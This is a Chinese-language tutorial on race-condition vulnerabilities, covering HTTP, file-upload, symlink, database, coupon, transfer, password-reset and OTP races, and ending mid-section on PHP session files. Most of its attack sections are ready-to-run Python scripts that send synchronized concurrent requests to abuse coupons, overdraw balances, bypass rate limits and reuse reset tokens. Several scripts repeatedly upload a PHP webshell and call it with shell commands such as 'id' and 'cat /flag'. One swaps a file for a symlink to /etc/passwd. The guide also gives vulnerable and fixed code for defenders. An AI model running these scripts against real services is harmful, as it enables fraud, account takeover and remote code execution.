梳理条件竞争(Race Condition)漏洞的原理、分类、Web 场景下的利用技巧、CTF 解题方法与防御措施,覆盖 HTTP 竞争、文件竞争、数据库竞争、TOCTOU 等多种场景。
一、条件竞争概述
1.1 什么是条件竞争
条件竞争(Race Condition)是指:
当多个进程/线程/请求并发访问共享资源时
程序的输出/行为依赖于这些操作的执行顺序
而该顺序是不可预测或不受控制的
→ 导致非预期的安全漏洞
形象比喻:
两个人同时从 ATM 取同一账户的钱
┌───────────────────────────────────────┐
│ 账户余额:100 元 │
│ │
│ 线程A(取 100) 线程B(取 100) │
│ 读取余额=100 读取余额=100 │
│ 检查 100>=100 检查 100>=100 │
│ 扣款 100 扣款 100 │
│ 写入余额=0 写入余额=0 │
│ │
│ 结果:取出 200,余额却变为 0! │
└───────────────────────────────────────┘
1.2 竞争条件形成的三要素
① 共享资源(Shared Resource)
文件、数据库记录、内存变量、Session、全局状态等
多个请求/线程都可以访问和修改
② 并发访问(Concurrent Access)
多个请求/线程同时或交叉执行
Web 场景:多个 HTTP 请求几乎同时到达
③ 非原子操作(Non-Atomic Operation)
对共享资源的操作不是一个不可分割的整体
典型模式:读取 → 判断 → 修改(Check-Then-Act)
在读取和修改之间存在"窗口期"
攻击核心:
在窗口期内插入另一个操作,破坏程序预期的执行顺序
1.3 竞争条件危害
| 危害类型 | 典型场景 | 危害等级 |
|---|---|---|
| 任意代码执行 | TOCTOU → 替换文件 → RCE | 🔴 严重 |
| 权限绕过 | 并发请求绕过一次性校验 | 🔴 严重 |
| 无限制资源消耗 | 优惠券/积分无限使用 | 🔴 严重 |
| 数据一致性破坏 | 超卖/重复支付/余额透支 | 🔴 严重 |
| 信息泄露 | 并发读取竞争状态数据 | 🟠 高 |
| 拒绝服务(DoS) | 竞争触发死锁/崩溃 | 🟠 高 |
| 身份混淆 | Session 竞争导致用户交叉 | 🔴 严重 |
1.4 条件竞争分类(按共享资源分类)
类型一:状态竞争(Limit Overrun)
典型场景:
检查用户是否有权限(如余额、次数、库存)
在检查和消耗之间存在窗口期
伪代码(漏洞版本):
if (user.balance >= price) { // ① 检查:余额充足
sleep(1ms); // ← 窗口期!
user.balance -= price; // ② 扣款
deliver_item(); // ③ 发货
}
攻击:
并发发送 100 个请求
每个请求都在 ① 时读到余额充足
然后全部通过 ② 扣款
→ 只有一份余额,却购买了 100 份商品!
影响场景:
- 优惠券/优惠码重复使用
- 积分/余额超额消费
- 投票/点赞超限
- 商品库存超卖
- API 调用次数限制绕过
类型二:TOCTOU(检查时到使用时)
TOCTOU = Time Of Check To Time Of Use
模式:
时间点 T1:检查资源状态(Check)
时间点 T2:使用资源(Use)
攻击:在 T1 和 T2 之间修改资源状态
文件 TOCTOU 经典示例:
T1: if (access("/tmp/file", R_OK) == 0) // 检查:有读权限
// ← 攻击者在此将文件替换为符号链接
T2: open("/tmp/file", O_RDONLY); // 使用:打开文件(实际打开了链接目标)
Web 场景 TOCTOU:
T1: 检查上传文件类型(白名单验证)
T2: 将文件移动到最终目录
攻击:在 T1 和 T2 之间替换文件内容
T1: 验证验证码有效性
T2: 消耗验证码(标记为已使用)
攻击:在 T1 和 T2 之间并发发送多个请求
类型三:数据竞争(Data Race)
多个线程/请求同时读写同一数据
没有适当的同步机制
示例:
请求 A 读取计数器值 = 5
请求 B 读取计数器值 = 5
请求 A 写入计数器值 = 6
请求 B 写入计数器值 = 6
最终值:6(应该是 7!)→ 更新丢失(Lost Update)
更新丢失场景:
- 访问计数器
- 文件并发写入
- 账户余额更新
- 库存数量更新
类型四:顺序竞争(Order Race)
程序假设操作按特定顺序执行
但并发环境下顺序可被打破
示例(注册流程):
预期顺序:验证邮箱 → 创建账户 → 发送欢迎邮件
实际:两个并发注册请求都通过了"邮箱唯一性"检查
→ 创建了两个相同邮箱的账户
示例(权限分配):
预期:创建账户 → 分配默认权限
实际:在分配权限前另一请求已使用该账户
1.5 条件竞争分类(按竞争窗口大小分类)
微窗口(Micro Window):< 1ms
→ 需要单包攻击(Single-Packet Attack)
→ 需要精确时序控制
→ 典型:内存中的变量读写
小窗口(Small Window):1ms - 100ms
→ 需要多线程高并发请求
→ 典型:数据库读-改-写操作
大窗口(Large Window):> 100ms
→ 普通并发即可触发
→ 典型:涉及文件 I/O、外部 API 调用
→ 典型:异步处理任务队列
1.6 竞争窗口与时序分析
1.6.1 识别竞争窗口
关键问题:在哪两个操作之间存在窗口期?
典型窗口模式:
① 读-检查-写(Read-Check-Write)
read(value) ← 读取当前状态
if (check(value)) ← 检查条件
write(value) ← 修改状态
窗口:read 到 write 之间
② 验证-使用(Validate-Use)
validate(input) ← 验证合法性
use(input) ← 使用输入
窗口:validate 到 use 之间(TOCTOU)
③ 创建-配置(Create-Configure)
create(resource) ← 创建资源
configure(resource) ← 配置资源
窗口:create 到 configure 之间
④ 生成-消费(Generate-Consume)
token = generate() ← 生成 token
store(token) ← 存储 token
窗口:generate 到 store 之间(可预测 token)
1.6.2 竞争窗口放大技巧
# 放大窗口技巧:让服务器在窗口期内执行更多操作
# 使窗口从微秒级扩大到毫秒级,提高攻击成功率
# 技巧一:发送大请求体(让服务器先解析请求,再处理逻辑)
# 在业务逻辑前插入大量无害处理时间
# 技巧二:利用 Nagle 算法(TCP 层面延迟)
# 故意发送不完整的 HTTP 请求,只差最后几字节
# 所有请求同时发送最后几字节 → 服务器同时处理所有请求
# 技巧三:利用服务器资源竞争
# 在高负载时发送请求(服务器处理更慢,窗口更大)
# 技巧四:针对涉及外部 I/O 的操作
# 数据库查询、文件读写、外部 API 调用
# 这些操作本身耗时 → 窗口天然较大
1.6.3 网络时序模型
单线程服务器(PHP 默认模型):
请求 A ──[处理中]──────────────────── 完成
请求 B ──[处理中]──────── 完成
→ 顺序执行,无竞争窗口(理论上)
多线程/多进程服务器:
请求 A ──[读]──[检查]────[写]──── 完成
↑
请求 B ──[读]──[检查]────[写]──── 完成
↑ 两者同时读到相同状态!
异步服务器(Node.js / Tornado):
请求 A ──[读]──[await DB]──[检查]──[写]──
↕ 事件循环切换!
请求 B ──[读]──[await DB]──[检查]──[写]──
→ await 处发生上下文切换 → 竞争窗口!
二、HTTP 请求竞争
2.1 基本并发攻击
#!/usr/bin/env python3
"""
基础 HTTP 竞争攻击脚本
使用 threading 模块实现并发请求
"""
import threading
import requests
import time
from typing import List, Dict, Any
TARGET = "http://target.com"
SESSION = requests.Session()
def make_request(url: str, data: dict, results: list, idx: int):
"""发送单个请求并记录结果"""
try:
r = SESSION.post(url, json=data, timeout=10)
results[idx] = {
"status": r.status_code,
"body": r.text[:200],
"time": time.time(),
}
except Exception as e:
results[idx] = {"error": str(e)}
def race_attack(url: str, data: dict, n_threads: int = 50) -> List[Dict]:
"""
并发竞争攻击
Args:
url: 目标 URL
data: 请求数据
n_threads: 并发线程数
"""
results = [None] * n_threads
threads = []
barrier = threading.Barrier(n_threads) # 同步屏障:所有线程就绪后同时发射
def worker(idx):
barrier.wait() # 等待所有线程就绪
make_request(url, data, results, idx)
# 创建所有线程
for i in range(n_threads):
t = threading.Thread(target=worker, args=(i,))
threads.append(t)
# 同时启动所有线程
for t in threads:
t.start()
# 等待所有线程完成
for t in threads:
t.join()
return results
# ── 示例:优惠码重复使用 ──
print("[*] 发起条件竞争攻击:并发使用优惠码...")
results = race_attack(
url = f"{TARGET}/api/apply-coupon",
data = {"coupon_code": "SAVE50", "user_id": 1001},
n_threads = 50
)
# 统计成功次数
success = sum(1 for r in results if r and r.get("status") == 200)
print(f"[+] 成功次数:{success} / {len(results)}")
for i, r in enumerate(results):
if r and r.get("status") == 200:
print(f" 线程 {i:3d}: 成功 → {r['body'][:80]}")
2.2 精确时序攻击(同步屏障)
#!/usr/bin/env python3
"""
精确时序攻击 - 使用连接预热 + 同步屏障
减少网络抖动,提高竞争成功率
"""
import threading
import requests
import time
TARGET = "http://target.com"
N = 30 # 并发数
# 预先建立持久连接(HTTP Keep-Alive),减少 TCP 握手延迟
sessions = []
for _ in range(N):
s = requests.Session()
s.headers.update({
"Connection": "keep-alive",
"Content-Type": "application/json",
})
# 预热连接:先发一个无害请求建立 TCP 连接
try:
s.get(f"{TARGET}/api/ping", timeout=5)
except:
pass
sessions.append(s)
print(f"[*] {N} 个连接预热完毕,准备攻击...")
results = [None] * N
barrier = threading.Barrier(N)
PAYLOAD = {"coupon": "VIP2024", "amount": 100}
def attack(idx: int):
barrier.wait() # 同步屏障:所有线程到达此处后同时继续
t_start = time.perf_counter()
try:
r = sessions[idx].post(
f"{TARGET}/api/redeem",
json = PAYLOAD,
timeout = 10,
)
results[idx] = {
"ok": r.status_code == 200,
"code": r.status_code,
"body": r.text[:100],
"ms": (time.perf_counter() - t_start) * 1000,
}
except Exception as e:
results[idx] = {"ok": False, "error": str(e)}
threads = [threading.Thread(target=attack, args=(i,)) for i in range(N)]
for t in threads: t.start()
for t in threads: t.join()
# 分析结果
ok_count = sum(1 for r in results if r and r.get("ok"))
print(f"\n[+] 攻击完成:{ok_count}/{N} 次成功")
timings = [r["ms"] for r in results if r and "ms" in r]
if timings:
print(f"[*] 响应时间:min={min(timings):.1f}ms "
f"max={max(timings):.1f}ms "
f"avg={sum(timings)/len(timings):.1f}ms")
2.3 使用 aiohttp 异步并发
#!/usr/bin/env python3
"""
使用 asyncio + aiohttp 实现高并发竞争攻击
适合需要大量并发(100+)的场景
"""
import asyncio
import aiohttp
import time
TARGET = "http://target.com"
N = 100 # 并发数
async def send_request(session: aiohttp.ClientSession,
url: str, data: dict,
idx: int, event: asyncio.Event) -> dict:
"""等待发令信号后立即发送请求"""
await event.wait() # 等待所有协程就绪后的发令
t = time.perf_counter()
try:
async with session.post(url, json=data, timeout=aiohttp.ClientTimeout(total=10)) as r:
body = await r.text()
return {
"idx": idx,
"status": r.status,
"body": body[:100],
"ms": (time.perf_counter() - t) * 1000,
}
except Exception as e:
return {"idx": idx, "error": str(e)}
async def race_async(url: str, data: dict, n: int = N):
"""异步竞争攻击主函数"""
event = asyncio.Event() # 发令枪
results = []
# 创建连接器(预建连接池)
connector = aiohttp.TCPConnector(
limit = n,
keepalive_timeout = 30,
enable_cleanup_closed = True,
)
async with aiohttp.ClientSession(connector=connector) as session:
# 预热:先建立连接
warmup_tasks = [
session.get(f"{TARGET}/api/ping")
for _ in range(min(n, 10))
]
try:
await asyncio.gather(*warmup_tasks, return_exceptions=True)
except:
pass
print(f"[*] 连接预热完毕,准备 {n} 并发攻击...")
# 创建所有攻击任务(此时未发送)
tasks = [
send_request(session, url, data, i, event)
for i in range(n)
]
# 给 asyncio 一小段时间让所有任务进入等待状态
await asyncio.sleep(0.1)
# 发令:所有任务同时发送
event.set()
results = await asyncio.gather(*tasks)
return results
# 运行攻击
results = asyncio.run(race_async(
url = f"{TARGET}/api/apply-coupon",
data = {"code": "FLASH50", "uid": 1001},
n = 100
))
success = [r for r in results if r.get("status") == 200]
print(f"[+] 成功 {len(success)}/{N} 次")
2.4 Burp Suite 竞争攻击
Burp Suite Turbo Intruder 使用方法:
① 在 Repeater 中构造请求
② 右键 → Send to Turbo Intruder
③ 使用以下脚本:
─────────────────────────────────────────────
def queueRequests(target, wordlists):
engine = RequestEngine(
endpoint = target.endpoint,
concurrentConnections = 30,
requestsPerConnection = 100,
pipeline = True, # HTTP Pipeline 同一连接多请求
)
# 发送 50 个相同请求
for i in range(50):
engine.queue(target.req, gate='race1')
# 同时释放所有请求
engine.openGate('gate1') # 触发所有排队请求同时发送
def handleResponse(req, interesting):
table.add(req)
─────────────────────────────────────────────
④ 关键参数说明:
pipeline=True → HTTP 流水线,同一连接发多个请求(减少延迟差异)
gate='race1' → 请求门控:先排队,等待 openGate 信号
engine.openGate() → 同时释放所有排队请求
Burp Suite 2023.9+ 内置 Race Conditions 功能:
① Repeater → 右键 → Add to group
② 创建请求组(同一组内的请求同时发送)
③ Group → Send group in parallel
三、文件操作竞争(TOCTOU)
3.1 文件上传竞争
漏洞场景:
许多 Web 应用文件上传流程:
┌─────────────────────────────────────────────────────────┐
│ ① 接收上传文件 → 临时保存到 /tmp/upload_xxx │
│ ② 检查文件类型/内容(白名单验证) │
│ ③ 如果合法 → 移动到最终目录 /var/www/uploads/ │
│ ④ 如果非法 → 删除临时文件 │
└─────────────────────────────────────────────────────────┘
竞争窗口:
步骤 ① 和 ② 之间,文件已存在于临时目录
但尚未被验证/删除
→ 在此期间访问临时文件路径 → 可能执行恶意文件!
攻击步骤:
线程 A:持续上传 PHP WebShell(文件名已知或可预测)
线程 B:持续访问 /tmp/upload_xxx.php(尝试执行它)
希望 B 能在 A 的文件被删除前访问到它
#!/usr/bin/env python3
"""
文件上传竞争攻击脚本
同时上传恶意文件和访问临时路径
"""
import threading
import requests
import itertools
import string
import time
TARGET = "http://target.com"
UPLOAD_URL = f"{TARGET}/upload.php"
WEBSHELL = b"<?php system($_GET['cmd']); ?>"
FILENAME = "shell.php"
SUCCESS_FLAG = False
def upload_thread():
"""持续上传 WebShell"""
global SUCCESS_FLAG
s = requests.Session()
count = 0
while not SUCCESS_FLAG:
try:
s.post(
UPLOAD_URL,
files={"file": (FILENAME, WEBSHELL, "image/jpeg")},
timeout=5,
)
count += 1
except:
pass
print(f"[*] 上传线程共发送 {count} 次")
def access_thread(path: str):
"""持续访问目标路径,检测是否执行成功"""
global SUCCESS_FLAG
s = requests.Session()
url = f"{TARGET}/{path}?cmd=id"
while not SUCCESS_FLAG:
try:
r = s.get(url, timeout=3)
if r.status_code == 200 and "uid=" in r.text:
SUCCESS_FLAG = True
print(f"\n[!] 竞争成功!RCE 触发!")
print(f" URL:{url}")
print(f" 输出:{r.text[:200]}")
break
except:
pass
# 可能的临时文件路径
PATHS = [
"uploads/shell.php",
"tmp/shell.php",
"upload/shell.php",
"files/shell.php",
]
# 启动攻击线程
threads = []
# 多个上传线程
for _ in range(5):
t = threading.Thread(target=upload_thread)
t.daemon = True
threads.append(t)
# 多个访问线程
for path in PATHS:
for _ in range(3):
t = threading.Thread(target=access_thread, args=(path,))
t.daemon = True
threads.append(t)
print(f"[*] 启动 {len(threads)} 个线程,开始竞争攻击...")
t_start = time.time()
for t in threads: t.start()
for t in threads: t.join(timeout=60)
if not SUCCESS_FLAG:
print(f"[-] 60 秒内未竞争成功,尝试增加线程数或调整路径")
else:
print(f"[+] 总耗时:{time.time() - t_start:.1f}s")
3.2 文件名预测攻击
<?php
// ── 漏洞代码:可预测的临时文件名 ──
$upload_dir = '/var/www/html/uploads/';
$filename = $_FILES['file']['name']; // 使用原始文件名
$tmp_path = $upload_dir . 'tmp_' . $filename; // 临时路径可预测!
move_uploaded_file($_FILES['file']['tmp_name'], $tmp_path);
// 检查文件类型
$ext = pathinfo($filename, PATHINFO_EXTENSION);
if (!in_array($ext, ['jpg', 'png', 'gif'])) {
unlink($tmp_path); // 删除非法文件
die('不允许的文件类型');
}
// 移动到最终目录
rename($tmp_path, $upload_dir . 'final_' . $filename);
echo '上传成功';
?>
# ── 利用可预测文件名进行竞争 ──
import threading, requests, time
TARGET = "http://target.com"
FILENAME = "shell.php"
TMP_URL = f"{TARGET}/uploads/tmp_{FILENAME}"
SHELL = b"<?php system($_GET['cmd']); ?>"
found = threading.Event()
def keep_uploading():
s = requests.Session()
while not found.is_set():
s.post(f"{TARGET}/upload.php",
files={"file": (FILENAME, SHELL, "image/jpeg")},
timeout=5)
def keep_accessing():
s = requests.Session()
while not found.is_set():
r = s.get(f"{TMP_URL}?cmd=id", timeout=2)
if r.status_code == 200 and "uid=" in r.text:
found.set()
print(f"[!] 竞争成功!{r.text[:100]}")
# 5 上传 + 5 访问
ts = ([threading.Thread(target=keep_uploading) for _ in range(5)] +
[threading.Thread(target=keep_accessing) for _ in range(5)])
for t in ts: t.daemon = True; t.start()
for t in ts: t.join(timeout=30)
3.3 符号链接竞争(Linux TOCTOU)
#!/usr/bin/env python3
"""
符号链接竞争攻击(针对 CGI / 服务端脚本处理)
在文件被检查和使用之间替换为符号链接
"""
import os
import threading
import time
# 假设服务器会读取 /tmp/user_upload 文件内容
TARGET_READ = "/tmp/user_upload" # 服务器要读的文件
TARGET_LINK = "/etc/passwd" # 攻击目标(符号链接指向)
SAFE_CONTENT = b"safe content" # 通过检查的安全内容
race_success = threading.Event()
def create_safe_file():
"""持续创建包含安全内容的文件(用于通过检查)"""
while not race_success.is_set():
try:
if os.path.islink(TARGET_READ):
os.unlink(TARGET_READ)
with open(TARGET_READ, 'wb') as f:
f.write(SAFE_CONTENT)
except:
pass
def create_symlink():
"""持续将文件替换为符号链接"""
while not race_success.is_set():
try:
if os.path.exists(TARGET_READ):
os.unlink(TARGET_READ)
os.symlink(TARGET_LINK, TARGET_READ) # 替换为符号链接!
except:
pass
time.sleep(0.0001) # 极短的切换间隔
# 创建检查线程(模拟服务器检查)和符号链接线程
t1 = threading.Thread(target=create_safe_file)
t2 = threading.Thread(target=create_symlink)
t1.daemon = t2.daemon = True
t1.start()
t2.start()
# 持续访问,检测是否读到了 /etc/passwd 内容
# (实际攻击中是让服务器去读取)
print("[*] 符号链接竞争攻击中...")
四、数据库竞争
4.1 SELECT-THEN-UPDATE 竞争
-- ── 漏洞场景:余额扣款(伪代码)──
-- 步骤 1:检查余额
SELECT balance FROM accounts WHERE user_id = 1001;
-- 返回:balance = 100
-- 步骤 2:在 Python/PHP 中判断
-- if balance >= amount: pass (此时另一请求也读到了 balance=100)
-- 步骤 3:扣款
UPDATE accounts SET balance = balance - 100 WHERE user_id = 1001;
-- 两个并发请求都通过了步骤 1 的检查
-- 都执行了步骤 3
-- → 余额从 100 变成 -100!(超额扣款)
-- ── 错误的"修复":在 UPDATE 中添加 WHERE 条件 ──
UPDATE accounts
SET balance = balance - 100
WHERE user_id = 1001
AND balance >= 100; -- 添加条件,但仍有竞争!
-- 为什么仍有问题?
-- 如果两个请求同时执行这条 SQL
-- 数据库在 READ COMMITTED 隔离级别下
-- 两个请求都能读到 balance=100
-- 都通过 AND balance >= 100 的检查
-- → 都成功扣款!
-- ── 正确修复:使用数据库事务 + 锁 ──
BEGIN;
SELECT balance FROM accounts WHERE user_id = 1001 FOR UPDATE; -- 行锁!
-- 另一个事务在此处被阻塞,直到当前事务提交
UPDATE accounts SET balance = balance - 100 WHERE user_id = 1001;
COMMIT;
4.2 重复提交竞争
#!/usr/bin/env python3
"""
重复提交竞争:通过并发绕过"只能使用一次"的限制
"""
import asyncio
import aiohttp
TARGET = "http://target.com"
COUPON = "NEWYEAR2024"
async def use_coupon(session: aiohttp.ClientSession,
coupon: str, idx: int) -> dict:
try:
async with session.post(
f"{TARGET}/api/coupon/redeem",
json = {"code": coupon, "user_id": 1001},
timeout = aiohttp.ClientTimeout(total=10)
) as r:
return {"idx": idx, "status": r.status, "body": await r.text()}
except Exception as e:
return {"idx": idx, "error": str(e)}
async def main():
N = 50
async with aiohttp.ClientSession() as s:
# 并发发送 50 个优惠码使用请求
tasks = [use_coupon(s, COUPON, i) for i in range(N)]
results = await asyncio.gather(*tasks)
success = [r for r in results if r.get("status") == 200]
print(f"[+] 成功使用优惠码 {len(success)} 次!")
# 正常情况应只能使用 1 次
# 竞争成功后可能使用 N 次
asyncio.run(main())
4.3 UNIQUE 约束竞争
#!/usr/bin/env python3
"""
数据库 UNIQUE 约束竞争:
即使有唯一约束,并发插入仍可能导致短暂的重复数据
"""
import threading
import requests
TARGET = "http://target.com"
# 并发注册相同邮箱
def register(email: str, results: list, idx: int):
r = requests.post(
f"{TARGET}/api/register",
json={"email": email, "password": "pass123", "username": f"user{idx}"}
)
results[idx] = {"status": r.status_code, "body": r.text[:100]}
results = [None] * 20
email = "target@example.com"
threads = [threading.Thread(target=register, args=(email, results, i))
for i in range(20)]
barrier = threading.Barrier(20)
def run_with_barrier(idx):
barrier.wait()
register(email, results, idx)
threads = [threading.Thread(target=run_with_barrier, args=(i,)) for i in range(20)]
for t in threads: t.start()
for t in threads: t.join()
success = [r for r in results if r and r["status"] == 201]
print(f"[+] 成功注册 {len(success)} 个相同邮箱的账户")
# 正常应只有 1 个成功
# 竞争可能使多个请求在 UNIQUE 检查前都通过
4.4 乐观锁绕过
乐观锁(Optimistic Locking)机制:
使用版本号/时间戳检测并发冲突
UPDATE orders
SET status = 'processed', version = version + 1
WHERE id = 1 AND version = 5; ← 检查版本号
若版本号不匹配(被其他请求修改过),更新失败
竞争绕过:
如果多个请求在几乎同一时刻都读到 version=5
并都执行 UPDATE ... WHERE version=5
在数据库层面,第一个执行的会成功(version 变为 6)
后续的由于 version=5 不匹配而失败
→ 乐观锁只能保证"只有一个成功",不能防止"多次尝试"
→ 对于余额扣款:需要应用层重试逻辑 + 充分的错误处理
→ 若应用不处理失败情况(直接返回成功)→ 仍然漏洞
五、业务逻辑竞争
5.1 优惠券/折扣竞争
漏洞场景:
- 每个账号只能使用一次的优惠码
- 限时限量的秒杀活动
- 积分兑换(检查积分 → 兑换商品 → 扣除积分)
- 邀请奖励(A 邀请 B 注册,奖励 A)
典型漏洞代码(Python/Flask):
# ── 漏洞版本 ──
@app.route('/api/coupon/use', methods=['POST'])
def use_coupon():
code = request.json['code']
user_id = request.json['user_id']
# ① 检查优惠码是否有效
coupon = db.query("SELECT * FROM coupons WHERE code=? AND used=0", code)
if not coupon:
return jsonify({"error": "无效或已使用的优惠码"}), 400
# ── 竞争窗口在此 ──(并发请求都通过了 ① 的检查)
# ② 标记为已使用
db.execute("UPDATE coupons SET used=1, used_by=? WHERE code=?",
user_id, code)
# ③ 给账户加余额
db.execute("UPDATE accounts SET balance=balance+50 WHERE user_id=?",
user_id)
return jsonify({"success": True, "added": 50})
# ── 安全版本 ──
@app.route('/api/coupon/use', methods=['POST'])
def use_coupon_safe():
code = request.json['code']
user_id = request.json['user_id']
# 使用原子性的 UPDATE(带条件的 CAS 操作)
# 只有在 used=0 时才更新,确保只有一个请求能成功
rows_affected = db.execute(
"UPDATE coupons SET used=1, used_by=? "
"WHERE code=? AND used=0",
user_id, code
)
if rows_affected == 0:
return jsonify({"error": "优惠码无效或已使用"}), 400
# 仅在成功标记后才执行奖励
db.execute("UPDATE accounts SET balance=balance+50 WHERE user_id=?",
user_id)
return jsonify({"success": True})
5.2 转账/支付竞争
# ── 漏洞场景:转账 ──
@app.route('/api/transfer', methods=['POST'])
def transfer():
from_id = session['user_id']
to_id = request.json['to']
amount = request.json['amount']
# ① 检查余额
balance = db.query_one("SELECT balance FROM users WHERE id=?", from_id)
if balance < amount:
return jsonify({"error": "余额不足"}), 400
# ── 竞争窗口 ──
# ② 扣除发送方
db.execute("UPDATE users SET balance=balance-? WHERE id=?", amount, from_id)
# ③ 增加接收方
db.execute("UPDATE users SET balance=balance+? WHERE id=?", amount, to_id)
return jsonify({"success": True})
# ── 攻击:并发 50 笔 100 元的转账(账户只有 100 元)──
# 成功转出 5000 元!
#!/usr/bin/env python3
"""并发转账攻击脚本"""
import asyncio, aiohttp, json
TARGET = "http://target.com"
TOKEN = "eyJhbGciOiJIUzI1NiJ9..." # 已登录的 JWT
N = 50
async def do_transfer(session, to_uid, amount, idx):
headers = {"Authorization": f"Bearer {TOKEN}"}
try:
async with session.post(
f"{TARGET}/api/transfer",
json = {"to": to_uid, "amount": amount},
headers = headers,
timeout = aiohttp.ClientTimeout(total=10)
) as r:
body = await r.json()
return {"idx": idx, "ok": r.status == 200, "body": body}
except Exception as e:
return {"idx": idx, "ok": False, "error": str(e)}
async def main():
async with aiohttp.ClientSession() as s:
tasks = [do_transfer(s, 9999, 100, i) for i in range(N)]
results = await asyncio.gather(*tasks)
ok = sum(1 for r in results if r["ok"])
print(f"[+] {ok}/{N} 次转账成功(账户应只有 100 元)")
print(f"[!] 实际转出约 {ok * 100} 元")
asyncio.run(main())
5.3 限时/限次 API 竞争
#!/usr/bin/env python3
"""
API 速率限制绕过
通过并发在速率限制计数器更新前发送多个请求
"""
import asyncio, aiohttp, time
TARGET = "http://target.com"
API_KEY = "ak_test_xxxxxxxxxxxx"
# 目标 API:每分钟只允许 10 次调用
# 但计数器是非原子更新的
async def call_api(session, idx, event):
await event.wait() # 等待发令
headers = {"X-API-Key": API_KEY}
try:
async with session.post(
f"{TARGET}/api/expensive-operation",
json = {"query": "sensitive_data"},
headers = headers,
timeout = aiohttp.ClientTimeout(total=10)
) as r:
body = await r.text()
return {"idx": idx, "status": r.status, "ok": r.status == 200}
except Exception as e:
return {"idx": idx, "error": str(e)}
async def main():
N = 50 # 期望调用 50 次(超过限额 10 次)
event = asyncio.Event()
async with aiohttp.ClientSession() as s:
tasks = [call_api(s, i, event) for i in range(N)]
await asyncio.sleep(0.05) # 让所有协程进入等待状态
event.set() # 发令
results = await asyncio.gather(*tasks)
ok = sum(1 for r in results if r.get("ok"))
print(f"[+] 成功调用 {ok}/{N} 次(限额 10 次)")
asyncio.run(main())
六、Session 与 Token 竞争
6.1 Session 竞争
# ── 漏洞场景:Session 状态共享 ──
# 服务器代码(漏洞版)
@app.route('/api/action', methods=['POST'])
def action():
user_id = session['user_id']
role = session['role']
# ① 检查权限
if role != 'premium':
return jsonify({"error": "需要 Premium 权限"}), 403
# ── 竞争窗口 ──
# ② 执行操作
result = do_premium_action(user_id)
return jsonify(result)
# 如果 session 在 ① 和 ② 之间被修改...
# (例如另一个请求将 role 降级)→ 权限检查已过,但权限实际已变
#!/usr/bin/env python3
"""
密码重置 Token 竞争利用
同时发送多个重置请求,尝试在 Token 消耗前多次使用
"""
import threading, requests, time
TARGET = "http://target.com"
VICTIM = "victim@example.com"
TOKEN = None # 从邮件中获取的重置 Token
def get_reset_token() -> str:
"""获取密码重置 Token(模拟)"""
# 实际场景:通过邮件、参数泄露等方式获取 Token
return "reset_abc123xyz"
TOKEN = get_reset_token()
def use_token(new_password: str, results: list, idx: int):
"""使用重置 Token 修改密码"""
r = requests.post(
f"{TARGET}/api/password/reset",
json = {"token": TOKEN, "new_password": new_password},
timeout = 5
)
results[idx] = {"status": r.status_code, "body": r.text[:100]}
# 并发使用同一 Token
N = 20
results = [None] * N
threads = []
barrier = threading.Barrier(N)
def worker(idx):
barrier.wait() # 同步屏障
use_token(f"hacked_password_{idx}", results, idx)
threads = [threading.Thread(target=worker, args=(i,)) for i in range(N)]
for t in threads: t.start()
for t in threads: t.join()
success = [r for r in results if r and r["status"] == 200]
print(f"[+] Token 使用成功 {len(success)} 次(正常应只能用 1 次)")
if len(success) > 1:
print("[!] Token 竞争成功!可多次重置密码")
6.2 验证码/OTP 竞争
#!/usr/bin/env python3
"""
OTP/验证码竞争攻击
在验证码被标记为"已验证"之前并发发送多个请求
"""
import threading, requests, time
TARGET = "http://target.com"
OTP = "123456" # 拦截到的 OTP(假设通过其他方式获取)
def verify_and_act(idx: int, results: list):
"""同时提交 OTP 验证并执行后续操作"""
# 场景:某些实现先验证 OTP,再在下一步操作中使用
s = requests.Session()
try:
# 步骤 1:验证 OTP
r1 = s.post(f"{TARGET}/api/otp/verify",
json={"otp": OTP, "action": "transfer"},
timeout=5)
if r1.status_code == 200:
# 步骤 2:执行操作(已通过 OTP 验证)
r2 = s.post(f"{TARGET}/api/transfer",
json={"to": "attacker", "amount": 10000},
timeout=5)
results[idx] = {
"verify": r1.status_code,
"action": r2.status_code,
"body": r2.text[:100]
}
else:
results[idx] = {"verify": r1.status_code, "failed": True}
except Exception as e:
results[idx] = {"error": str(e)}
N = 30
results = [None] * N
barrier = threading.Barrier(N)
def worker(idx):
barrier.wait()
verify_and_act(idx, results)
threads = [threading.Thread(target=worker, args=(i,)) for i in range(N)]
for t in threads: t.start()
for t in threads: t.join()
ok = sum(1 for r in results if r and r.get("action") == 200)
print(f"[+] {ok}/{N} 次操作成功(OTP 应只能用 1 次)")
七、常见场景条件竞争
7.1 PHP 文件包含竞争
<?php
// ── 漏洞场景:文件上传 + 包含 ──
// 上传处理(upload.php)
if ($_FILES['file']['size'] < 1000000) {
$tmp = $_FILES['file']['tmp_name'];
$dest = '/var/www/uploads/' . basename($_FILES['file']['name']);
move_uploaded_file($tmp, $dest); // ① 移动文件(临时路径存在!)
// ② 检查文件类型
$ext = pathinfo($dest, PATHINFO_EXTENSION);
$allowed = ['jpg', 'png', 'gif'];
if (!in_array($ext, $allowed)) {
unlink($dest); // ③ 删除非法文件
echo '不允许的文件类型';
exit;
}
echo '上传成功: ' . $dest;
}
// 窗口期:① 到 ③ 之间文件存在(可能 1-5ms)
?>
#!/usr/bin/env python3
"""PHP 文件上传竞争攻击"""
import threading, requests
TARGET = "http://target.com"
SHELL = "<?php system($_GET['cmd']); ?>"
FILENAME = "evil.php"
stop_flag = threading.Event()
def upload_loop():
"""持续上传 PHP WebShell"""
s = requests.Session()
count = 0
while not stop_flag.is_set():
s.post(
f"{TARGET}/upload.php",
files={"file": (FILENAME, SHELL.encode(), "image/jpeg")},
timeout=5
)
count += 1
print(f"[*] 上传 {count} 次")
def access_loop():
"""持续访问上传路径,检测是否执行"""
s = requests.Session()
url = f"{TARGET}/uploads/{FILENAME}?cmd=id"
while not stop_flag.is_set():
try:
r = s.get(url, timeout=2)
if "uid=" in r.text:
stop_flag.set()
print(f"[!] 竞争成功!RCE 触发!")
print(f" 结果:{r.text[:200]}")
# 继续执行其他命令
for cmd in ["cat /flag", "whoami", "ls /"]:
r2 = s.get(f"{TARGET}/uploads/{FILENAME}?cmd={cmd}")
print(f" {cmd}: {r2.text.strip()}")
break
except:
pass
# 5 个上传线程 + 5 个访问线程
threads = (
[threading.Thread(target=upload_loop) for _ in range(5)] +
[threading.Thread(target=access_loop) for _ in range(5)]
)
print("[*] 开始竞争攻击...")
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join(timeout=60)
7.2 PHP Session 文件竞争
<?php
// ── PHP Session 文件默认存储在 /tmp/sess_<sessionid> ──
